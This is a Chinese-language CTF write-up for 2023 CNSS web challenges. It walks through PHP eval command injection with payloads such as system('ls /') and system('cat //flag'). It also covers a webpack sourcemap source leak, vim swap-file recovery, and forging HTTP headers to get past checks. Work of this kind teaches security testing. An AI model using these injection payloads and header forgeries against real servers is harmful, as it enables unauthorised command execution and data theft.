当前位置: 首页 > news >正文

2023CNSS——WEB题解(持续更新)

[Baby] SignIn

进来看到
在这里插入图片描述

按钮点击不了,想到去修改代码,要“检查“,但这里的右键和F12都不可用
还好还有其他方法
检查的各种方法

选用一种后进入检查页面
在这里插入图片描述

删掉这里的disabled即可
在这里插入图片描述

点击后得到flag
在这里插入图片描述

[Baby] Backdoor

进入,看到
在这里插入图片描述

有eval,利用命令执行漏洞

cnss=system('ls /');

在这里插入图片描述

获取flag文件夹里的文件名:

cnss=system('ls /flag');

在这里插入图片描述

获取flag:

cnss=system('cat //flag');

在这里插入图片描述

[Baby] Webpack

了解一下什么是Webpack,及其有什么漏洞

Webpack是一个用于构建现代Web应用程序的开源JavaScript模块打包工具。它可以将多个JavaScript、CSS、图片等资源打包成一个或多个优化后的bundle文件,以提高应用程序的性能和加载速度。Webpack通过模块化的方式管理代码,使开发者可以以模块化的方式编写代码,然后通过Webpack将这些模块打包成可在浏览器中执行的代码。

可能有源代码泄漏:不正确的配置可能导致打包后的源代码在生产环境中被泄漏。这道题就是此漏洞,具体利用方式如下:

进入题目,看到
在这里插入图片描述

检查,找到.js文件
在这里插入图片描述
知道其路径为:http://124.221.34.13:50003/static/js/main.c91fb7d1.js

访问http://124.221.34.13:50003/static/js/main.c91fb7d1.js.map,就成功下载了源代码
在这里插入图片描述

此文件还需要还原,先安装工具
如何还原前端代码

请随便选一个文件夹(记得把源代码移进去),打开cmd
在这里插入图片描述在这里插入图片描述

还原:reverse-sourcemap -v main.c91fb7d1.js.map -o output,得到还原后的代码
在这里插入图片描述在这里插入图片描述
找到flag
在这里插入图片描述

[Easy] Leak

得看一下题目描述
在这里插入图片描述

先了解一下上面情况会出现什么漏洞:
使用vim时会创建临时缓存文件,关闭vim时缓存文件则会被删除

当vim异常退出后,因为未处理缓存文件,导致可以通过缓存文件恢复原始文件内容

以 index.php 为例:第一次产生的交换文件名为 .index.php.swp

再次意外退出后,将会产生名为 .index.php.swo 的交换文件

第三次产生的交换文件则为 .index.php.swn
——————————
来获取.index.php.swp,并整理其中代码
在这里插入图片描述

查看根目录文件:

/?cnss@30fc5b20a309996f3ab12662e3c4ac932c08db7f=system('ls /');

在这里插入图片描述

得到flag:

/?cnss@30fc5b20a309996f3ab12662e3c4ac932c08db7f=system('cat  /fl4444444g');

在这里插入图片描述

[Easy] ezhttp

进来,看到
在这里插入图片描述

http的题目一般来说直接抓包,再去一步一步地满足要求
1
在这里插入图片描述
在文件开头把GET修改为CNSS

CNSS /Index HTTP/1.1

2
在这里插入图片描述
修改User-Agent

User-Agent: Mozilla/5.0 (Linux; Android 10; XXX Build/QKQ1.190910.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 MicroMessenger/8.0.0.1920(0x2800004D) Process/appbrand2 WeChat/arm32

3
在这里插入图片描述
修改Referer

Referer:cnss.io

4
在这里插入图片描述
修改X-Forwarded-For

X-Forwarded-For:127.0.0.1

5
在这里插入图片描述
修改HOST

Host: uestc.edu.cn

6
在这里插入图片描述
修改Content-Type

Content-Type: application/json

7
在这里插入图片描述在最下面胡乱输入
在这里插入图片描述
8
在这里插入图片描述
给一个json数据

{"name": "Alice","age": 25
}

9
在这里插入图片描述
把一个数据命名为password

{"password": "Alice","age": 25
}

10
在这里插入图片描述
把一个数据命名为name

{"name": "Alice","password": "25"
}

11
在这里插入图片描述
json和Cookie改为相同
在这里插入图片描述

12
在这里插入图片描述
先了解如何在HTTP请求中表示Basic认证:

构建认证字符串:将用户名和密码用冒号分隔,然后将该字符串进行Base64编码。例如,如果用户名是 "username",密码是 "password",您可以将它们合并并进行Base64编码得到 "dXNlcm5hbWU6cGFzc3dvcmQ="。添加认证头部:将Base64编码后的认证字符串添加到HTTP请求头的 "Authorization" 字段中,使用 "Basic" 前缀。 Authorization: Basic dXNlcm5hbWU6cGFzc3dvcmQ=

方法:修改Authorization

Authorization: Basic MTIzOjEyMzQ1Ng==

————————————————————
得到flag咯:
在这里插入图片描述

http://www.lryc.cn/news/117788.html

相关文章:

  • Unity之ShaderGraph 节点介绍 数学节点
  • springboot mongo 使用
  • 如何使用appuploader制作apple证书​
  • Promise详细版
  • v-for循环生成的盒子只改变当前选中的盒子的样式
  • Spring Data JPA源码
  • 如何防止CSRF攻击
  • linuxARM裸机学习笔记(7)----RTC实时时钟实验
  • NSS [UUCTF 2022 新生赛]ez_upload
  • 【操作系统】操作系统知识点总结(秋招篇)
  • 篇十九:迭代器模式:遍历集合
  • 浅谈JVM中的即时编译器(Just-In-Time compiler, JIT)
  • Android 13 Launcher——长按图标弹窗内容修改以及小组件等隐藏起来
  • 又一个不可错过的编程大模型来了让你惊呼“码农人生”不虚此行
  • 【Express.js】集成SocketIO
  • 为树莓派Pico配置交叉编译环境和工具链arm-none-eabi-gcc时可能会遇到的错误以及解决方案
  • Yum 部署K8S集群
  • 初阶C语言-操作符详解(下)
  • reposync命令——下载yum仓库中全部的包到本地
  • LC-杨辉三角
  • Golang空结构体struct{}的作用是什么?
  • 自然语言处理从入门到应用——LangChain:提示(Prompts)-[示例选择器(Example Selectors)]
  • 【实战项目】c++实现基于reactor的高并发服务器
  • Docker部署ElasticSearch7
  • 【算法|数组】滑动窗口
  • 笙默考试管理系统-MyExamTest----codemirror(2)
  • 一次面试下来Android Framework 层的源码就问了4轮
  • 知网期刊《中阿科技论坛》简介及投稿须知
  • kafka是有序的吗?如何保证有序?
  • centos 定时脚本检测tomcat是否启动,未启动情况下重新启动